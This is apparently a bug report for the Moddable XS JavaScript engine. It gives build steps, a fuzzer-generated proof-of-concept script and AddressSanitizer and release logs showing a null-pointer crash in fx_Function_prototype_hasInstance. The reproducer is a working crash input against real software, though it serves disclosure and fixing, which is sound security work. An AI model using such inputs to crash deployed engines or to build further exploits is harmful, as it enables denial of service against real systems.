*   operating system: ubuntu20.04
*   cimmit hash: db8f973
*   compile command:

    cd /pathto/moddable/xs/makefiles/lin
    make debug or make release
    

*   test command:

**poc**

    function assertThrows(code, type_opt, cause_opt) {
        if (typeof code === 'function')
            return code();
        if (typeof code === 'string')
            return eval(code);
    }
    (function () {
        var F = {};
        F[Symbol.hasInstance] = null;
        assertThrows || F ? 7160833982606838.000000: assertThrows(assertThrows, /[\WD]/i, /T61/);
    }());
    (function () {
        var F = {};
        F[Symbol.hasInstance] = function () {
            return undefined;
        };
        print(0 instanceof F, false);
        F[Symbol.hasInstance] = function () {
            return null;
        };
        print(0 instanceof F, false);
        F[Symbol.hasInstance] = function () {
            return true;
        };
        print(0 instanceof F, true);
    }());
    (function () {
        var F = {};
        F[Symbol.hasInstance] = function () {
            throw new Error('always throws');
        };
        try {
            0 instanceof F;
        } catch (e) {
            print(e.message, 'always throws');
        }
    }());
    (function () {
        var BC = function () {
        };
        var bc = new BC();
        var bound = BC.bind();
        print(bound[Symbol.hasInstance](bc), true);
        print(bound[Symbol.hasInstance]([]), false);
    }());
    print(Function.prototype[Symbol.hasInstance].call(Array, []), true);
    print(Function.prototype[Symbol.hasInstance].call({
        "L0VB0": assertThrows
    }, {
        "getPrototypeOf": assertThrows
    }), false);
    print(Function.prototype[Symbol.hasInstance].call(Array, 0), false);
    (function () {
        'use strict';
        function F() {
        }
        assertThrows(function () {
            F[Symbol.hasInstance] = v => v;
        }, TypeError);
    }());
    (function () {
        function F() {
        }
        var counter = 0;
        var proto = Object.getPrototypeOf(F);
        Object.setPrototypeOf(F, null);
        F[Symbol.hasInstance] = function (v) {
            ++counter;
            return true;
        };
        Object.setPrototypeOf(F, proto);
        print(1 instanceof F);
        print(1, counter);
    }());
    

*   asan log

    =================================================================
    ==2131098==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000542885 bp 0x7ffc6530e8d0 sp 0x7ffc6530e8a0 T0)
    ==2131098==The signal is caused by a READ memory access.
    ==2131098==Hint: address points to the zero page.
        #0 0x542885 in fx_Function_prototype_hasInstance /home/sakura/moddable/xs/sources/xsFunction.c:546:11
        #1 0x59b4b7 in fxRunID /home/sakura/moddable/xs/sources/xsRun.c:842:8
        #2 0x5426e1 in fx_Function_prototype_call /home/sakura/moddable/xs/sources/xsFunction.c:526:2
        #3 0x59b4b7 in fxRunID /home/sakura/moddable/xs/sources/xsRun.c:842:8
        #4 0x5b50e2 in fxRunScript /home/sakura/moddable/xs/sources/xsRun.c:4766:4
        #5 0x61567c in fxRunProgramFile /home/sakura/moddable/xs/tools/xst.c:1387:2
        #6 0x60fbef in main /home/sakura/moddable/xs/tools/xst.c:281:8
        #7 0x7f08b5c6e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #8 0x42e6bd in _start (/home/sakura/moddable/build/bin/lin/debug/xst+0x42e6bd)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/sakura/moddable/xs/sources/xsFunction.c:546:11 in fx_Function_prototype_hasInstance
    ==2131098==ABORTING
    

*   release log

    [] ~/sk-afl-js/moddable_workdir <main> ~/moddable/build/bin/lin/release/xst fuzz_output/fuzzer1/crashes/id:000021,sig:06,src:002188,op:$null$,pos:0.js 
    false false
    false false
    true true
    always throws always throws
    true true
    false false
    true true
    [2]    2105934 segmentation fault  ~/moddable/build/bin/lin/release/xst

Tag

#ubuntu